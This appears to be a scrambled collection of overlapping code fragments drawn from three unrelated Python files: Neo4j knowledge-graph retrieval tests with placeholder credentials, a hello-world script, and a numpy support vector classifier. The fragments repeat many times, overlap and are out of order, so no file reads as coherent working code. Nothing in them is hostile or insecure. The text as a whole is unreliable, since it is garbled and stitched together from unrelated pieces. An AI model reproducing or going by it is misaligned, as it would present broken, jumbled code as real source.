"os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the",
"\"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [",
"test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\":",
"json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL',",
"way we do pytest fixtures import json import os import pytest from .setup.neo4j_",
"this stuff happens because of the incredible way we do pytest fixtures import",
"\"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with",
"yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\":",
"get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>')",
"\"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": {",
"<PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) ==",
"get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test",
"options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, }",
"'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking",
"NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges",
"'<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\":",
"KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, },",
"the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>,",
"{ \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ]",
"'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with",
"def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL,",
"get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD',",
"import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD =",
"\"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges)",
"with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError): get_node_properties(node_ids,",
"NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484',",
"NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges",
"we do pytest fixtures import json import os import pytest from .setup.neo4j_ import",
"= '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] ==",
"happens because of the incredible way we do pytest fixtures import json import",
"edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\":",
"\"\"\"Test Neo4j.\"\"\" # pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the",
"# pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way",
"NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options",
"import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474')",
"os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER",
"edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [",
"import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER =",
"== 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the",
"edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER,",
"^^^ this stuff happens because of the incredible way we do pytest fixtures",
"test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\":",
"\"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options)",
"edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def",
"\"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope',",
"} edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids =",
"disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way we do",
"nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER,",
"] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError):",
"} edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert",
"= get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank():",
"pytest fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties",
".setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD",
"NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert",
"# ^^^ this stuff happens because of the incredible way we do pytest",
"{ \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id],",
"from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j')",
"pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError): get_node_properties(node_ids, **options)",
"pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way we",
"{ \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids =",
"from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\":",
"of the incredible way we do pytest fixtures import json import os import",
"len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from",
"pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER',",
"assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges",
"<PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options)",
"os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = {",
"}, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1"
"<gh_stars>0 #!/usr/bin/env python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello",
"\"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed 'Hello",
"python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed",
"#!/usr/bin/env python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.')",
"Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed 'Hello {name}.'\")"
"np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X)",
": float update ratio of the lagrange multiplier decay_step : int number of",
"decision boundary and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray",
"0, self.C, out=a) mask = a > 0 self.X = X[mask] self.t =",
"t[:, None] * Gram while True: for i in range(decay_step): grad = 1",
"self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance from",
"if X.ndim == 1: X = X[:, None] assert X.ndim == 2 assert",
"t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a =",
"the boundary \"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim",
"self.C, out=a) mask = a > 0 self.X = X[mask] self.t = t[mask]",
"penalty of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X,",
"n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y",
"np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters",
"@ t) * t / t2 np.clip(a, 0, self.C, out=a) mask = a",
"decay min_lr : float minimum value of learning rate Attributes ---------- a :",
"input Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance",
"boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) +",
"its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t",
"x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance",
"* grad a -= (a @ t) * t / t2 np.clip(a, 0,",
"labels of the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns",
"---------- x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray",
"vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t : (sample_size,)",
"ndarray input Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\"",
"= a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X,",
"for i in range(decay_step): grad = 1 - H @ a a +=",
"self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X)",
"self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the input Parameters",
"ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y =",
"support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t :",
"(sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from the",
"b : float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of",
"class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ----------",
"input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x)",
"<gh_stars>1-10 import numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct",
"def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ---------- x",
"range(decay_step): grad = 1 - H @ a a += lr * grad",
"(sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\"",
"ndarray corresponding labels 1 or -1 learning_rate : float update ratio of the",
"np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H = t *",
"the lagrange multiplier decay_step : int number of iterations till decay decay_rate :",
": (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update ratio",
"decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ---------- X",
"= np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the decision",
"np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr *= decay_rate",
"minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier",
"X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t))",
"\"\"\" estimate decision boundary and its support vectors Parameters ---------- X : (sample_size,",
"= learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else:",
"if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) *",
"* self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict",
"numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector",
"t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X = X[mask]",
"def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and",
"kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel",
"None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of",
"float minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange",
"x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted",
"def predict(self, x): \"\"\" predict labels of the input Parameters ---------- x :",
"support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim",
": (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim ==",
"self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C ==",
"* Gram while True: for i in range(decay_step): grad = 1 - H",
"ndarray distance from the boundary \"\"\" distance = np.sum( self.a * self.t *",
"of the boundary \"\"\" if X.ndim == 1: X = X[:, None] assert",
"np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the decision boundary",
"C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary",
"------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum(",
"predict labels of the input Parameters ---------- x : (sample_size, n_features) ndarray input",
"+ self.C / 10 Gram = self.kernel(X, X) H = t * t[:,",
"@ self.a) def predict(self, x): \"\"\" predict labels of the input Parameters ----------",
"np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X)",
"( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @",
"labels \"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self, x):",
"x): \"\"\" calculate distance from the decision boundary Parameters ---------- x : (sample_size,",
"self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C /",
": float penalty of misclassification \"\"\" self.kernel = kernel self.C = C def",
"__init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel",
"------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label =",
"(sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1 or",
"1 - H @ a a += lr * grad a -= (a",
"calculate distance from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray",
"= np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b return distance",
"distance : (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a",
"---------- kernel : Kernel kernel function to compute inner products C : float",
"1: X = X[:, None] assert X.ndim == 2 assert t.ndim == 1",
"distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ---------- x :",
"1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a =",
"a += lr * grad a -= (a @ t) * t /",
"self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01):",
"self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels",
"> 0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b =",
"True: for i in range(decay_step): grad = 1 - H @ a a",
"(self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\"",
"np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)):",
"(n_vector, n_features) ndarray support vectors of the boundary \"\"\" if X.ndim == 1:",
"= t * t[:, None] * Gram while True: for i in range(decay_step):",
"---------- a : (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector",
"axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break",
"distance from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input",
"value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b",
"of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b :",
"= t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a *",
"from the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X),",
"learning_rate : float update ratio of the lagrange multiplier decay_step : int number",
"assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2 =",
"- H @ a a += lr * grad a -= (a @",
"X) H = t * t[:, None] * Gram while True: for i",
": (sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a *",
"ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label def",
"@ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self, x):",
"decay_step : int number of iterations till decay decay_rate : float rate of",
"\"\"\" predict labels of the input Parameters ---------- x : (sample_size, n_features) ndarray",
"of the lagrange multiplier decay_step : int number of iterations till decay decay_rate",
"self.distance(self.X) * self.t)): break if lr < min_lr: break lr *= decay_rate def",
"of iterations till decay decay_rate : float rate of learning rate decay min_lr",
"labels 1 or -1 learning_rate : float update ratio of the lagrange multiplier",
"self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t,",
"np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram",
"of the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns -------",
"decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance",
"- self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def",
"(sample_size,) ndarray distance from the boundary \"\"\" distance = np.sum( self.a * self.t",
"n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from the boundary",
"compute inner products C : float penalty of misclassification \"\"\" self.kernel = kernel",
"(a @ t) * t / t2 np.clip(a, 0, self.C, out=a) mask =",
"None] assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2",
"lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray support",
"lagrange multiplier decay_step : int number of iterations till decay decay_rate : float",
"decay_rate : float rate of learning rate decay min_lr : float minimum value",
"input data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate :",
"Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label",
"learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a",
"/ t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X =",
"t / t2 np.clip(a, 0, self.C, out=a) mask = a > 0 self.X",
"= np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X,",
"label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the",
"and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data",
"np.clip(a, 0, self.C, out=a) mask = a > 0 self.X = X[mask] self.t",
"from the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns",
"(sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update ratio of",
"= 1 - H @ a a += lr * grad a -=",
"min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ---------- X :",
"Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance =",
"Parameters ---------- X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray",
"ndarray input data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate",
"np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if",
"support vector classifier Parameters ---------- kernel : Kernel kernel function to compute inner",
"if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C",
"to compute inner products C : float penalty of misclassification \"\"\" self.kernel =",
"Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float bias parameter",
"n_features) ndarray support vectors of the boundary \"\"\" if X.ndim == 1: X",
"rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float bias",
"decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ----------",
"== np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10",
"1 or -1 learning_rate : float update ratio of the lagrange multiplier decay_step",
"grad = 1 - H @ a a += lr * grad a",
"ndarray support vectors of the boundary \"\"\" if X.ndim == 1: X =",
"vector classifier Parameters ---------- kernel : Kernel kernel function to compute inner products",
": (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from",
": float minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray",
"ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray",
": (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1",
"break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return (",
"< min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a",
"assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C ==",
"H @ a a += lr * grad a -= (a @ t)",
"corresponding labels 1 or -1 learning_rate : float update ratio of the lagrange",
"parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\" if",
"multiplier b : float bias parameter support_vector : (n_vector, n_features) ndarray support vectors",
"== 2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if",
"self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01,",
"/ 10 Gram = self.kernel(X, X) H = t * t[:, None] *",
"Kernel kernel function to compute inner products C : float penalty of misclassification",
"lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t))",
"self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t",
"(sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector, n_features)",
"t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t",
"== np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01,",
"t * t[:, None] * Gram while True: for i in range(decay_step): grad",
"till decay decay_rate : float rate of learning rate decay min_lr : float",
"self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if",
"a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H =",
"return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X))",
"distance from the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x,",
"x): \"\"\" predict labels of the input Parameters ---------- x : (sample_size, n_features)",
"np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a)",
"fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its",
"+= lr * grad a -= (a @ t) * t / t2",
"@ a a += lr * grad a -= (a @ t) *",
"X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding labels",
"break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t",
"the boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1)",
"self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else: if",
"bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary \"\"\"",
"* self.t, 1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break",
"mask = a > 0 self.X = X[mask] self.t = t[mask] self.a =",
"distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b return",
"np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t)) +",
"X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum(",
"t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf:",
"self.C / 10 Gram = self.kernel(X, X) H = t * t[:, None]",
"C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel function",
"-1 learning_rate : float update ratio of the lagrange multiplier decay_step : int",
"classifier Parameters ---------- kernel : Kernel kernel function to compute inner products C",
"decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None]",
"boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance :",
"None] * Gram while True: for i in range(decay_step): grad = 1 -",
"X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support",
"t) * t / t2 np.clip(a, 0, self.C, out=a) mask = a >",
"data t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float",
": float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the",
"int number of iterations till decay decay_rate : float rate of learning rate",
"* t[:, None] * Gram while True: for i in range(decay_step): grad =",
"self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t *",
"the decision boundary Parameters ---------- x : (sample_size, n_features) ndarray input Returns -------",
"self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t - np.sum( self.a",
": int number of iterations till decay decay_rate : float rate of learning",
"X = X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr",
"X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr = learning_rate",
"else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr",
"Parameters ---------- kernel : Kernel kernel function to compute inner products C :",
"y = self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate",
"in range(decay_step): grad = 1 - H @ a a += lr *",
"n_features) ndarray input data t : (sample_size,) ndarray corresponding labels 1 or -1",
"= np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H = t",
"break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break",
": (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return",
": Kernel kernel function to compute inner products C : float penalty of",
"X.ndim == 1: X = X[:, None] assert X.ndim == 2 assert t.ndim",
"boundary \"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim ==",
"or -1 learning_rate : float update ratio of the lagrange multiplier decay_step :",
"while True: for i in range(decay_step): grad = 1 - H @ a",
"self.kernel(X, X) H = t * t[:, None] * Gram while True: for",
"learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters",
"lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] * self.kernel(self.X,",
"== 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C == np.Inf: a",
": (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels",
"float rate of learning rate decay min_lr : float minimum value of learning",
"number of iterations till decay decay_rate : float rate of learning rate decay",
"0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean(",
"\"\"\" self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000,",
"a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X),",
"import numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support",
"* self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1,",
"input Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label :",
"self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9,",
"lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) -",
"t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors",
"self.a @ (self.t * self.t[:, None] * self.kernel(self.X, self.X)) @ self.a) def predict(self,",
"lr * grad a -= (a @ t) * t / t2 np.clip(a,",
"Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,)",
"\"\"\" calculate distance from the decision boundary Parameters ---------- x : (sample_size, n_features)",
